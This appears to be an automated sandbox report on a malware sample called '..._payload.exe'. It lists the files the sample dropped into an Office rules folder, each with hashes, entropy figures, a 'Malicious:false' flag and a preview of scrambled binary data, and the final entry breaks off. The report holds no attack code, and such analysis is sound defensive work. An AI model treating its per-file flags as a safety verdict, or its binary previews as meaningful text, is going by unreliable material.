                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2074
                                                                                                                          Entropy (8bit):7.893153693852121
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Gu4Hd1EbP44aMg9n0fCEc3OpCJ/W/BmMFDQ51UP40r5rDz0DwD:GuiE958n0aEEYDDQMQm5L0Ds
                                                                                                                          MD5:9805C55721B7BB8A57FC5EDE595896A5
                                                                                                                          SHA1:9FB0E538E1D9242C5467FFEB50A041BEA0D2A8BB
                                                                                                                          SHA-256:DD723558FD8D1BE9C47B842D9C46AFF1E428D4687EBD9C2FCF19F184D6E5C1F2
                                                                                                                          SHA-512:FEBA848A7EEA0854999FE2227070683FDF966A739EF749703731BB37B13E2D483F15DB81E68075A161D3B904F4AD33F876C350F655E3C1FC5D29AD8F8574D958
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.nk..>..V0Cy#<D0@....O.v.".Q.c._..IP.}..NV.?.P..!..=U7.........e.{.j.jR.....6.......'......[P26..9...%N..pc.<..~7..N.*t.g...Z..A.>....3...q7.D..}.....`+m.@*.H.e...1..1x..'k{9.J...E.B...@M.yg&...K./.F..{...t.$.]M>.q......_uX...c[.U..?.6.P..@..D.....Q*..87.....rDS.'.q.[.... .(.u=1..-..!..qiJ.s.;.0i..Y%......u.. ..g....y.......ok.......F<.Z."<*S...X.k.......])....#s....\..S...D..Ogda(e...._x......K.....4..c.!..5....E.y."...Y..,f.........ky[.....Tx..}...".J?..z..1^.a..=4..+.fTd..;.Z2v....7.Qe..d...@.]0......./s.....o.1t.D".......&-K...Q.(.(.....R.......~.8_.OA...5.K...b..f....v...TwH..kc.b..M.f.F9....y.n"...d..T...!|;.I.K..u6....0p....R..eh.....|Z8.n}.:Y..0.h....4......z.gP....1l...o.A...k...]..4....j....}q.tU.V...jX..j..a.~A.....9_...N&.y..?&.. ...t.....g/..[.=.Q.$).y..D.........5.2....&w3H4.ixDf.7......Z.0.#."........._).PB....U.?c.{x.d%C.%.O.GP.e4.-....K..a..s.4.<tr.D..#..X.l4AE..0.....yQ...2$<..}[rlxo!?y....y.g*...5.E..rH.l.A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):321907
                                                                                                                          Entropy (8bit):6.629248343192977
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:jQzboO//zw+XU792wylHVu6KF0OtrA5924e4DlmlOylmfmtn:jsX/rfXUB7gVj24dDlmlOlfmF
                                                                                                                          MD5:07D92401B7B2D417F3CD7D99B8105B9C
                                                                                                                          SHA1:6C6AAE6F025A8E2E051F368C0F82A64CF07D71EF
                                                                                                                          SHA-256:6A75E24CA013049ED5E719C641A64FC54801A5937ED1A29FCDE0338792D7F219
                                                                                                                          SHA-512:35A8CFE24D9F7BDA154134D5D2DFECE683EF20A52B0D319D3027E1A19B56A2CAC2863493F6EC0B10ADE28B8320A5537FEE38C0957D45281942E4C92C5AB2380A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule..t4....gN......_=..xzgw......O.c'..r..[(L.).. .a".e..x.0.......w.....OM..(.+8..tZ..x)B..D.....z..A.D..It.GVWv...I..4..H...*.KN%.R...?.8.b^n.a}/.vt..".b.+..~.....6swk.....!gt....Wd...D....o.G.D.+L..........F.l E..K.X.....E....8..+.A.8`n-&p..%q+..|.g.>O-.u9q:.5.}..`@.o...g#.........P...;..:.G..@.\N..C....\x7..}..;&.h.XIV.|...R.QP.K#.L.^.....Ad.n..p...c!.F.....W.J..8...A5.....n...[H.cOc..$.ke.<...j....etnl8:..7.U.T..4J.....A...3.A..@..%K.....n.3M......2...|@......F4..*...^qK<`...T.....e}.I......1.u...Vo.M..}.t.....Q..`Q.........);.B...)..?..s..~.r2F...5$..p...Cz...d.a.%.-.s..\z.....1=5#.%..l.UK6.w.BjA.`.`....KH...:T..g....m.]......;{.,G7.sO...^..+.J+....O.I{..@..Sb.....i.G......s.>...sA...C.I......b.K./.....|....\t.Scd@.k.).V...*a.F.6D`(i......:....t.]$...._.t!. '.DO.O#....../...;...G.G...}.e....>.}V.k.......b...... P.2.....[....;....81...lE.#,Bt#&........ms._....K..........!a?.-f..m......A.)B.,....r.T.5....*7<.\ ..1.z...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700450v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1689
                                                                                                                          Entropy (8bit):7.885158966985406
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:RGxzNWvVaQXsDIVAgyOhClpa8FFnWRE3YhrsfU8D:azNWvVaHDIPCa8FWO3YhrsfU4
                                                                                                                          MD5:D846514202AB368BBB366EB6E5CEE18E
                                                                                                                          SHA1:C3EE7CCB7C9382DD58D227840316E3AED64B6FB3
                                                                                                                          SHA-256:B45C1D9C27823D4B0F81564709FA9C39337C9ABEF1FB79C14BCC63066E70F57C
                                                                                                                          SHA-512:77215902C28EC3FA119D3974342E34900B598D94C067779B26BF54ED1F0DE3121D4DA928566166F32C2866E3C8247B8979F465B6218EA681474923E8FB51619A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..;$.=......B.......%...h.*,.aT.R....TA...w......`....N.k.....K..^ub9C.Z...I.....j.\h!.......j.}b.2..[.vu!)..C@K..e.(K6..X...m.......F..._i.V.A.'..Ok.[... VY..[..C_.....lj...J....K.=F.P. .5..QC...X.uu..g`..6'.V.....;?..t}...U...V..H.....5xs.Dx$m...-..Nb..3).Q.=.yd.m..n..;....y.T...XV..Z..|...).E.....g..8..|.w.%.jP.....4.zz..%..<....+.ej..O..C!..........-..e.P<...9.............l.js6....=.;...............-.L.'O-.U.Bs?iKt.........z.>.z..0.p...`(s......b.oe!...p.$-.....?.e.+-...(0F.>......N.@....cU|.q.j.-0...O[.<...M{..l.O....eB.~g.^....r.w.*........{].h+......mzZW...0n8R>..}.~.RM.7.4;.Z(.G..`.....|.P..?...B...$Q.t......K.Dj.L......(2E.;...{...>2.<.r..h.Z^Y.c.V.2%.._j..HD........).;.....5#..Y......!x.O.X.L..@.......cY.g.0.X...."p.(:Q..Num4.,...xI..Sd.v._....?.q.~...X....{w?O.q.R@........#..4.............0..L....@.+..F3..o..:.....T-ocRz....E.Un:......Z;jIT9l....<.8u..l..0N&...O.....2Q.Y...B.|a.R?yk,.5[....[X].+F..0....YrNQgg..o.g.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700451v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.8776690550689645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ttBa7BvTQQ/wgst8O1AynSv248oELIHpwDQoE/254iD:tPyTQiwgsVnnYqkHCX9
                                                                                                                          MD5:9791791CA9CB758E03CEEAA1779A8AF7
                                                                                                                          SHA1:B3B3145E3192A42A868350ECA51CCD09746122BE
                                                                                                                          SHA-256:E36156F687AB0919CB184B9C54AA4ECC61A8E2E70CDCA50DB555916BBEA37607
                                                                                                                          SHA-512:8CF51B761D2896538E2B42634A9FC8DF0AFF5F35E6173180877478B11A41B5AB992B34C728FF0BE5708832EAE657B9520BEEBAF053CA5F451BED715F9338C15B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.p...#9...]."z|....#.../.u.D2.......a....F..~........&[..`5.....~5..k.f>J.....~DA.x.o.'k`,.....o.k...V....m?mE..X...h}...7=.s..E...'k.V..j.J].+...|...A..G..;&D..z.f.O.j.Q..8........R..?b.h.s......N...F.$.......=_.~z..0...u.N$~...I.......>.8..-.^.B.....3...O. .${:..|..N.^.].*h.M..bK.wGO=n.../.Y9............S...tDM.)..O|..iy..Eh..*....x5.... ....g..E....J}J.`.>..9:?..JW.Lo.S.N...d\.$....7.....32#{...X..Dl;V.v..0.T1...z.#S.u.n.oG...8.x..4h.....k.Pt2[......8}....E..TV...0......??.^....P.......Kj.. .....dq..3...=..F.....P.u....z#[.,.....n<5.tg1 .kY.NJJ+....h.........zA.{..o.Px.#e.;.E...S..C.<1.2....`BS..Ld..w..qpo..~..4.Ee...F.s;.;."....R..\.N....t....D.TA..Dl......./$P..`....h..q.2......[....>...$b...A.`..Lt.B...Q.FP..f.......F.U1k.'.9|1.$(..%.Rq.pY.|i..<..d..]..\......wcC......)..G.1...K....^&N.`...Ct.....W......-...+.F+z.Tv.F.|.W.....*......._...Y.....J....l..u.A.z.........6.W....Vs..3.;.Z..\.C..c.....E...../.....4...\=.n|..`....Vu. l

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700500v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.879939560339763
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:fTogzGZ68hjyozpKUa4VN7CFLbmcnXr/3mogZn4VR4v02G0VPBtEa9DaAGbD:sgqZ62yJUbrCJBmTffCa9DWD
                                                                                                                          MD5:41848E8E4541320E14E38884BDC4B3D0
                                                                                                                          SHA1:BA0306499DF84B2BC9F9DD00F0E823245B6AC245
                                                                                                                          SHA-256:3B281B21E22DA92B5BEE5153F5B458861D8010E10073BF590E9AF566ADD85D3D
                                                                                                                          SHA-512:FF50FBCEA7D6A9906F0DC9A21A47C8D892AEC2BBF87E2DCFB6369C16A138B5CA9EDCB149845BEB20E00DFB9588DB34554D6356D3C1FAACA46EB8312BC2839885
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml{wk3V...S...-.f..^.....7.0..r..S^....`..N.n{...D.}U.$.4.{....o .~.y*t..sH..4l....Y.3. 5{...=..Hw..o...+v.....R.VNt.j.b9..MM.E^...q.......,.}yu...![.H....M'6...%'....ji....0F,..MF....WF...--..x.k..M...:..Z.....K........:yv.-. ...o6......:..!..C[.....b..T. ...G...dsCm..>......E.....FQ=..=.:'.|..6#q..}..[.o.a.7n..7.e..wV\.....z..Q.........n@.}G..j..3..9(.G....-c.UJ}.1.r..z......#..?..d.e`..8wC.6m..'..S.`5M.........7..j..H..,!...G.|...?.Z.p'G.W..y.......DV.`<B=..K..o.yZ.>#z...JY...`...Y.....z..C..0.|..3..X!b>.........hd:yf3k.,.`Q.]S..%...[8PR.Y....o]..z6:..O...z.|fEM....gI......,&..}.Y...~.V......V7...@.%L..Uf..>...&'...g.To\z.S*Udz.o9.N.v.l..%..t.u...*.i...D.....S+.!..i7!.V.1v8..\...;B..s...>.-$~Y...D. QTE.XkB.g.@...p././.M..~...bQ{.o.9...m...b.......0...?z.<..k....~.1..v.H.2'V........yc..:..T..s.'...G......=...K..wY......w)...V.....&._.;H..2.x...Z..;U...g... ..V\.*?.W..~P......TY.HQ+R.R.`..f[3....Z.M.T..s..T8d..././E...M..6......Y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700501v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.895668568638015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c0WpeYu6CPAhfyOMf3hiSJOeajZ/RzldCP/8D:c0FBRPAhfyOI3qldGPQ
                                                                                                                          MD5:9B6C236934F508A788B83DBE3847FDEC
                                                                                                                          SHA1:D77090C8704FE4999030802CAF131AC590FBEBDC
                                                                                                                          SHA-256:58F6F46F0272875CD839E1B2E7632AA7010A2614D4D9A4EC4E4C038026BE491F
                                                                                                                          SHA-512:BD9EE8C4DEE940B83EF827DC865579794D7E89AFE92AD4C5D3A41B9FB681035A52C9A0864CC2E411762AED9BA7520E029BA5C408524B3448519DEF844C3015F6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml2....Y..t.....s...u...5Jg......xh.v..{.....&.u..f......X..gW..".a.bp...{..m^t......8..-...<x.J.`..d...*...N`l.@.d..; .3d%...EPV.S....{US).m.r....K]j........`.y.h.;...e.(]...@...2-..q.%9.a..........0..>.....u...&.B.g.'.Y/g....B_ ....*B=..).d.F......*,.'q.3.>...W.z..#.A....j4.L....n....Zn..y(^..^(.*..q.W..\*..;....B.?,.).OB.&...g..[..."..p.t.%'`........Y.c.$.. ..p.et+.....A..|.N.0...;.K......:..6q...a.0....R....r..?...'..R6.......Oz...i.o.A..*@..........x...8y..b.9.....7........~L(.,..~. .nc....66.._'....(.p.N....q..nY.d...1x..x&q..F.M.`..O....U....A...u...1.O`<....M..<..f.s.x...ot..L\.....N.....w.H...D!..6.....VU..jY..5.,+...~.........J...f''"....P'r.9.S...*..+".s..S-....r..*.....).vs/..9+1z.3...^I....!....JH....{6..!...S...A8...W.>...e....v,.Q.4qxWL.S....7.`.`.P...U:.....F.C?y......S....P.t I#..w%K..:.6w.Y...mv.t..,R].....9.U#.z.o...i4X.Nq....aV..~.......7P].`..>.8.-.q...~..D^G.....=RG...t......5&y8...'9R..J.........7.(..`$F.!.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700550v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1689
                                                                                                                          Entropy (8bit):7.883030115650711
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MLrLqNCZ54JW5F1Ia4xf6XvUZpIR4B99IUrVD:86YNIa4xSXvR4ttt
                                                                                                                          MD5:A4B7A83F1534A3B3088CD50DDC0B1593
                                                                                                                          SHA1:BE06D9091C83BEF9C7552577A50CDC6B38521242
                                                                                                                          SHA-256:E08512CE403A6A6198FC894FB23519B77FCA75836B54513E8D7DD954A7014E2B
                                                                                                                          SHA-512:3B0F940D8391B3A2C3A81519764AF5B93F39052E9802863323F501F2F45A6AC97FC3603AA0EE2D4D8BBAE488035E380ECAFF6F482AE5554F38942F0F1896BB06
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml5D....15..O.a....=F.....ZW8*.."...9l0G\.....y.u.q...0H).=.,I...W..os2.m....n....x.....3.jBo.]..A...xNd.g=.......f*..0]..Q.p.;..?...0....?.E**...?..C/.?LX.....G....n/j.Z......V4[.o.....*0..f..........R...[.t...f.V.N;2.EN.V...TLb.S.D6..%...<...*:..+..;Y.yW.9Q.$N2.6Ew#........N?1..KW!TQ...&....;_`.>.J..[...s...X.?.W%I].f.$).W\1...C.s..;yc.%i......~y...<L..A....{..../A8..5.......NS={.Uw..y7.#.Z..m....w..A....IV.$b......w..QG......T.G.S.......'O...I.4.t....r...WR)cJ.;s.ofE..H.....A)*M..K..i......c..:%.Vw..S...i....k.|.._.3e....{.eU.F....zk...`.$."^.t........M.DN[..M..eB.f...l..\.'..=..M...nO!W......j?h...=3..i .g.pOC..}.[<......G....a..XI.G!.W.!......j.q.N@6#Y....|8.C.;....Ml'+(u.o.mh..............y..*..$.jx.7o.8....NDA.k.6I[.\.....0..g.C.\.S`.!)....3.].?.C.$4o...#|m...*0.nh..8.i5....?~qsq.X2.k.U....le...v..k%2.iS...~...D......M. ...H.{e?..W....(q.z..rZ...NU..o.g<..1,..vVC...*.r.5.hS..O....>..1D..s..!..{C...s#(......s...sn.$....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700551v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.877052978009506
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Tj4guIK8Jw6rx0amujKSd1F+82HNxwqMcezR0BjdD:X+6F0KeSd1UFnIpzo
                                                                                                                          MD5:A2ED22714EEC728B6542601181D68C4C
                                                                                                                          SHA1:6C3502EF51DC2F8A7B2C3F2E1F5A3E6C5A43A569
                                                                                                                          SHA-256:A21200F250DEB6E1AEF86E4DE3D824DBD724CA9C5F2FDB6259C835CAB7FBD849
                                                                                                                          SHA-512:23E334C43C48269D465E23B3675CBA20541ED99121ECEC2E08F15D63E62A4A2564E6BA5C88670E6F483CC3E42CC1F8382CA0AA5E1D7A98F239A97EE6FD909268
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....v.\r.b.'ir}..x..F..8.&c....._]\.....p;...r...^..q.w..f..Ru...f.Z...3.rI...?....0'7.L&.XHJ&..n..........@.E.......Q7g..w#p...5...XT...+@A.iF.d...o.Z?0...e=...~Ko..1..0....,r..J...J....N.H,.H....@.T..............6...=.L_p.!;..Z...y..T.T.r....I....i`O0d.y...mM\sD@...'...0..Z.m.1...g]T.+...y...r.)...M!..W.......%4...>.Uq.&.Q.l....<m.0R.N+...^........g..AZI.#A.j.....G......gu...Z...'.z..z..V.h...7...x.z.r.U..9...M..LI..........+]..Z..........5}...%.......y$.......:+....M$...].d%.Hq..+.J..j.....6.-...K.......n....,.H..;. V......>.."....XK.,.K....#......>.Wk$..q.......F6..9..Y..o..`.p.....r...(.p.b..q...xy...hb..Epb}<.....\?..O*X.#g..../...n9&..c.......d.1.a..K..k........._^...m....X.....j.&e.!p..=......ic`...CQ...0W..6..h...8V... 9..E&.a,.SY...<M.$$tNL..`u|..6A.v...:v..Y.k.v.".....*...#3f:....r.p.*+&...n>_|Yr...)(.yJ.,H..BjuQ..>n....^............L}.....2.......!.2.H.=..}.d....,...o...C:s.=Q.M...Jw.z.xp.......T..Z.~...*l....2r...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700600v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.886528264980607
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xy8VduNE6bc1tUzDkAbRF9EqxI19lcy8zaTxyqBkmIao5s/to+xS4foHQVQ6K+4b:Vuxc16z92XlQ4yBmIaIaq+xEwVBKD
                                                                                                                          MD5:40A0EB418AE9243E1A1C28FDF912D143
                                                                                                                          SHA1:B76AF569F41358BD29B8FED18F90601D659D850D
                                                                                                                          SHA-256:5BFCC9116A9C0D7E1B21DAE7ECA87995467FD0BB5F54659536671353D148D99E
                                                                                                                          SHA-512:064A796EFCE324064C8DE577CF213FF124EBE6AD020CCD82B78497856926858EF10A6C9A670896603D9860E39C3D2A79FEE669AAF05E8D9FF7F9C4F503B98051
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..Q.X.q....;9.w..d.:..;|w...9.my.......%..G.]%.,..`...0.L2,.0-..G/9}.}.#...p...'Z..x..V...N....@....yA.%...`..eW...;.D....WB.."*..Sy.B...j.....w.r+F...T"..k..w.gu....1J.T...g.!..k...0U.3.=..+.*.x `.A.b.19AJ..,|..>..uCT..casy.&.6..fH.F;e..............x....g:......P!......[..t.6.....+.....Y.........J .6..B2........AG...y.H0..Z...S#4..l.r-QtX.U.%_....s..N[..+..."..7..h.o2K..k!.....E{O..+......C~......:./...X&k4Q..Qap..@.).#2i......a.p$.. .z...|...}.....@.pW....&.......@o.l.^...7...T.^3..b.$.v@TG..%.............:.?.<....}7..*..X.B..x].u.X..!J7.._#..v.....(.q.....0..oz.....)..!h....a.Z..@..+4V']..:8..9....W2zn........ ..k.y..R.'\*.v.3P`.....Y...."2(..p.1zZU.K...........6Dey..M0u....G_..X.G..z.J.u..........$Z..@LO...hW....k......a'.X.`.]...tj.~..8..:..(.8..SS|$..........j(;....L."...1.....f.!.f..9.%;l"....L.X..D=..q.%..%p8.=.....:M..^&.C.le.......K...H......-w.v.$.p.....(.|p/...{sgc5X..S1l..4,..6.*.6..f.<.........!f["!.{.k3gZ<.#..q. ..fl.f..e.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700601v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.888887738642443
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:eQOEhfDUklDvuHmXOIAoKcmHmKvSh6tiOGxWUD:ewDPlqB0KvmuUAidxN
                                                                                                                          MD5:6A7CFC8A0792066FE4C6F3F791C74704
                                                                                                                          SHA1:350D7F69A8C8465E633EF5B6E0EDD87F8BE3CCF7
                                                                                                                          SHA-256:E257CE996DC83A0C2061ADE495AB474B8650C2A8652EE2D7008A73815E39E44E
                                                                                                                          SHA-512:56F49E1E186C182329775AD7B3258C2CEEDDB55D7B82E2D74D9A3A509CFA17BD6C81DF895E7551E08294BF5CC6E07A7C40B535A550E2EF1948532BE7D94122F5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmllPu...y.......A.G.....e..5?8..+%}..+....T.l..J...._6....;.YP...|.G..|.....u&6.v.,&.z.y 2...,..n........b.Y....*..VC2.f\$.16US.E..@g?.c/G.......}X".9..z.[.xO..u.....u......"88.JG.......B.5...x<........j.8...N~W.jq...FpF.y......}.:A.."...q-oO.?GBP.}..v...[.......4.}3.(H.M..#.'...2....[.I..c.5U......p*of~.0:....N.N?..(K.]&}.6..3Q.6..g....Xa. .r.....Q.]...V..O.9..._..2....*6;...t..\.[..v.../Q../ikzo....E&.......\V.LPF.......#.qidu.N.Q.;R."...z)..._......m.._...\....d.<..].\.1...-...S...>.8..v@*>...|."rL.|..`k...!`%.#..:.....q.c.N..@&.Oq.y..p.....k.)..o.*.1..N.j..!.'.....4.x|&.6..L.WL7F.......Y.O^o..KV......!G..9.....h&...'.Hp..<.^.k....)Q........x..#X.s.....{.....[..N..t*6&+GK'F..3&...W7.j.Q.+7..Hf.i.v..I...q.....,,._@..v.(...^..a.ON(N.4.,...D.r..W.V....../M}.e_..W......"...$.....W.Y@n...B.fU.u........o.'+....V../:#.gI7Y.......n..L~.............u.m..E0....JbA..@..|...O....F./Z.w.1..}..h....=.%.)c!..w\..)o.FS.*.....C......]....7....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700650v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.887182811897061
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:vW5bUBggbGTB45DZAc8KwkZdNMSLbQNgoHALop79npNxcXlD:v2PTB45FAWjNnQNgeT9pk
                                                                                                                          MD5:65753FACF458125A2E7F035383969A50
                                                                                                                          SHA1:BE628F2F43FEDEA70BBFBF9E6F2AFAF8030219B6
                                                                                                                          SHA-256:CF96AE6FDF06839A51F4C1B839D30E003BACAB3F47172FF43F059877BD615218
                                                                                                                          SHA-512:EFD538CF68D412FD30829A134A32878264B419950FE377D37C80B4403A7F843C76D8927C7F8DE5ADD00C402F5BE63C4C3D9E33FAF996CCD68122AFC89A63D2E8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.w..f.Hw..k..B..*...).%g..|......P2.d...3(..G.c.......|....3..<....t!0.......bG"..3>.(D7..^u...JUM...qj..:1.....8........C......!T2...~.o<.^qCH1..tZ#XXO!.X.b.^..W.]1..48S..k3.....PT.R..&=|.p....m.Z......GgZ.r.I...5G..R*.=.G..).`.B.'.Us.5...4..... Bb...v.t9..m.q......N....Y5!ve...]W.,Z.-[..@c.&..R#.!..'.|...1..Q.`......I....Es.!.t......A..v..D.0...o.P...e...-.`..M...v...DAS.........|.gG.K....\..^"bi....+..C.h$..fw..1_V.|j.7.H..:v..r......8vQ........Wd...g..8.B.}H..._Fh.?D.bW..>.EoV.{.../N.2..SRa.H3.?.1L...B....y.......N..)....k-)...yiS.G.1A......nF....E......O.6....|(..)...H..6...a.#..h.^..:ll..5%.w{.)p&....F.YE.g......k...o.b~..:faQ..8L.......Y.]..<za.z........&.N.c._\./6..q.....-"N...gu.#.2pS....SC.......m.'.S.....Z..?^C...g.Qb...&..h.g...p..~..o..4TU:c.:.n{U..lR...[.....1c5}SF...:.<A3.Zkg....Wr# .K.d.#o..u.N..,..Z.zt.......h..n....O...q..l..<i~..R.)2m....]y...>.2...C.d...f....&.Ke....e>.....+..R..J..}..|=fB.<y..w.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700651v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.904318827143134
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ue1o0DtjOJaIWsuGr8eu5S5yxBhQH7PEBT6I5NVa5VOiPV38d+bD:R1o0DZOB7Qeu+JrEB+INVa5xPS8D
                                                                                                                          MD5:4A99ABAC7345D32F6F215275C659945C
                                                                                                                          SHA1:D17374379A5B8D458C45D9164C487ADC6D3EFDD1
                                                                                                                          SHA-256:F7E0A227DCDF607FB4F0D030DB3E57E421DE299F05D901FCDDE2012248B34BED
                                                                                                                          SHA-512:917937A54A7C8A40B9BB3BC0CBEDF3D50C928DAC73A6DA0419A0A4F28AFD8105885CB46AFFDE08CD19758E01EE7692FC3562AC21372001BAAA7B666428F6772F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml."2.....z....j."..B4.........^.r.%.i..e.:...)..}.?.#..5.5.w...7vW.>h.D4y....M..N..[..J..[..s...._)L........)..h.T.p....n.....P.I.|.....l;z.a.D..#n6.=J..o.\....<..,...~n.Z.C....mS............l...:FV.-...)Px..|.%............^K....Mt.b.m..r0...._..G..Sd. ...d.....e.+.gi#..-..[#.O...9.....[....H...'.....)6..%.L.0.....(DQ.yyKS....:..=...;8..%.L....e^.<.%M...e@y...82..9.&1`3`>...........T*yPB.K...O..K........4.w..XY.VA...U.s..ZO.5....&.R.:I..........IXe.a.._..\..hX}/...`.Q.ek.&OG?U..<x...,.....O.%.NU....Q.8O8..T....SI..u........v..oM#...r9S.6.v.2..c......O....Dt..k.P,.7~ ?-.......!A>@;....}.i" s\.....n5.D.x...91_..s..P..D.(.~=..g.o.RI_.+..'.\.]1.A.... 3...b.....0#/....../0....w.<zR........q..f...F..n.p.B....,...[.O..........h.\.CiCI..A./....v/..c.Of.x...a.U..."....[ouu...$._]....J........wf..S.T..t....1...Mao....aU4=..eb.`."Gx...5...y.K...NK..o.G.......ng...Ig.t3.~.I$#...3.1.S.'..+Y7%.S..yH....f.6.(.ZFF.......nBO..u..s.lN.......%.p.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700700v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.867889778624432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XL3+X9W29R7LjutKXgR8LOPu9b5ll/J1u01jyUJy+KWxdlQjfJJGBUietBbyOAJ/:AxR7XutcCNQ5r1lyUXKULWzGBUpAJTD
                                                                                                                          MD5:BBA38478526829FF34F3069FB9275314
                                                                                                                          SHA1:2C48E48E1EAB6BBE1A63E4DF0CA4AD750455FDAD
                                                                                                                          SHA-256:5BFA30D9EC30C2660B65F9FBFF29B0C54223625D4E145F9CC6CDA654309A09E7
